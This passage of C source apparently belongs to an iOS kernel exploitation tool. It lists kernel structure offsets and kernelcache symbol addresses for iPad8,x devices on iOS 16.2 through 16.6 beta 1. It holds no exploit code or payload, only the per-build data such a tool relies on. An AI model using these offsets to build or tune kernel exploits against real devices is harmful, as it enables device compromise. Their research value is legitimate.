0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,4 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,4", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,4", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,4", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,5 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,5", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, 